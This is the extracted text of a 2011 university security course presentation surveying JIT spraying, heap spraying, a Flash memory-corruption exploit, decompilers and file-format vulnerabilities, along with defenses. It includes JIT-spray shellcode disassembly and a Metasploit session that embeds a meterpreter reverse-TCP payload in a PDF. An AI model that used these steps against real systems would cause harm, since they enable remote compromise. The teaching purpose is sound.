EECS 354:A Survey of Techniques to Facilitate ExploitationJonathan FriedmanMax GoldmanBrian LangeJosiah MatlackAaron Steinfeld November 29, 2011

Overview

JIT Spraying Heap Spraying Application-specific Exploits Decompilers File Format Vulnerabilities Demo

JIT Spraying

Introduced by Dionysus Blazakis in 2010

Designed to overcome ASLR and DEP JIT is executable “Spraying” covers the heap in exploit code

Used in ActionScript code Predictable address space layout

Used by implementing the xor operation

JIT Spraying (cont)

var y = ( 0x3c54d0d9 ^ 0x3c909058 ^ 0x3c59f46a ^ 0x3c90c801 ^ 0x3c9030d9 ^ 0x3c53535b )

03470069 B8 D9D0543C MOV EAX,3C54D0D90347006E 35 5890903C XOR EAX,3C90905803470073 35 6AF4593C XOR EAX,3C59F46A03470078 35 01C8903C XOR EAX,3C90C8010347007D 35 D930903C XOR EAX,3C9030D903470082 35 5B53533C XOR EAX,3C53535B

JIT Spraying (cont)

var y = ( 0x3c54d0d9 ^ 0x3c909058 ^ 0x3c59f46a ^ 0x3c90c801 ^ 0x3c9030d9 ^ 0x3c53535b )

0347006A D9D0 FNOP0347006C 54 PUSH ESP0347006D 3C 35 CMP AL, 350347006F 58 POP EAX03470070 90 NOP03470071 90 NOP03470072 3C 35 CMP AL, 3503470074 6A F4 PUSH -0C03470076 59 POP ECX03470077 3C 35 CMP AL, 3503470079 01C8 ADD EAX, ECX0347007B 90 NOP0347007C 3C 35 CMP AL, 350347007E D930 FSTENV DS:[EAX ]

JIT Spraying (cont)

Defenses exist Signature detection▪ Looks for NOPs▪ High false-positive rate

Heuristics▪ Look at xored values ▪ Stateful▪ Look for short jumps

Heap Spraying

Modified heap overflow technique used to overcome address space randomization

Allocates “blocks” throughout heap containing a nop sled followed by malicious code

Increases the chance of malicious code being executed

Heap Spraying (cont)

NOZZLE: Heap Spraying Defense

Developed by Microsoft Research in 2008

Defends against heap spraying by:1. Scanning each individual object on

heap, looking for nop slides followed by shellcode

2. Looking for heaps with a high proportion of malicious objects

Application-specific Exploits

Exploit a vulnerability specific to an application to corrupt memory

Can be quite complex and difficult to prevent or debug

In order to help prevent these exploits, code should be tested extensively Error codes are your friend Check them

Application-specific Exploits (cont)

Example: Adobe Flash Can set a parameter to a negative value Guarantees a failed allocation whose return

value is never checked The program does pointer arithmetic between

this (now NULL) pointer and a user input value Allows user to write to memory But, this isn’t directly useful because the value

written is only marginally of the hacker’s choosing

So what do we do?

Application-specific Exploits (cont)

Example (cont): ActionScript VM Can also execute ActionScript from a Flash file ActionScript VM verifies its input by using bitmasks

from memory, but then executes them directly Overwriting these bitmasks with the previous

exploit allows us to execute unverified code Now save the EIP, replace it with selected pointer,

and execute a return to jump to that pointer (presumably at some shellcode loaded in the Flash file)

Then, restore the saved EIP and return like nothing happened

Decompilers

Decode the binary-file format Decode the machine instructions into

assembly code for that machine Perform semantic analysis to recover

some low-level data types such as long variables, and to simplify the decoded instructions based on their semantics

Decompilers (cont)

Store the information in a suitable intermediate representation If a suitable intermediate language is used, the next 2 steps can be used with any assembly language to generate any procedural HLL code.

Perform data flow analysis to remove low-level aspects of the intermediate representation that do not exist in HLLs, e.g. registers, condition codes, stack references.

Decompilers (cont)

Perform control flow analysis to recover the control structures available in each procedure (i.e. loops, conditionals and their nesting level)

Perform type analysis to recover HLL data types such as arrays and structures.

Generate HLL code from the transformed intermediate code.

Decompilers (cont)

File Format VulnerabilitesIn the news… Duqu

Installer recently found in the form of a .doc file

iOS Jailbreaks Have taken

advantage of PDF and TIFF handling vulnerabilities

File Format Vulnerabilites (cont)At their most abstract level:

Things handle files. Specially craft the file, and you may be able to manipulate the thing.

Programs, OSs

Crash, reverse engineer, execute arbitrary code

Documents, images, videos

Why so popular?

1. They’re more stealthy.

2.They’re getting easier to do.

Tools of the Trade

File Format fuzzers 4f and Metasploit Brute-force

approach Metasploit can

also be used to automate attacks as usual for kids!

Prevention

1. Don’t be stupid.

2. Client-side antivirus

3. Keeping software up to date

PDF Exploit Using Metasploit

Metasploit can inject executable code into a .pdf file, which will launch on startup

Exploited on Windows XP SP3, with Adobe Reader 8.0 and below

Also works on Foxit Reader After exploiting the .pdf, the .exe

injection will run automatically

Exploit code

msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(adobe_pdf_embedded_exe) > set LHOST localhost LHOST => localhost smsf exploit(adobe_pdf_embedded_exe) > set INFILENAME test.pdf INFILENAME => test.pdf msf exploit(adobe_pdf_embedded_exe) > exploit

[*] Started reverse handler [*] Reading in 'test.pdf'... [*] Parseing 'test.pdf'... [*] Parseing Successfull. [*] Using 'windows/meterpreter/reverse_tcp' as payload... [*] Creating 'evil.pdf' file... [*] Generated output file

/home/jwm903/.msf3/modules/exploits/data/exploits/evil.pdf [*] Exploit completed, but no session was created.

Additional Options

EXENAME The Name of payload exe. FILENAME The output filename. (default: evil.pdf) INFILENAME The Input PDF filename. LAUNCH_MESSAGE The message to display in the File: area

(default: To view the encrypted content please tick the "Do not show this message again" box and press Open.)

ContextInformationFile The information file that contains context information

DisablePayloadHandler Disable the handler code for the selected payload

EXE::Custom Use custom exe instead of automatically generating a payload exe

EXE::FallBack Use the default template in case the specified one is missing

EXE::Inject Set to preserve the original EXE function EXE::OldMethod Set to use the substitution EXE generation method. EXE::Path The directory in which to look for the executable

template EXE::Template The executable template file name. EnableContextEncoding Use transient context when encoding payloads VERBOSE Enable detailed status messages WORKSPACE Specify the workspace for this module WfsDelay Additional delay when waiting for a session

DEMO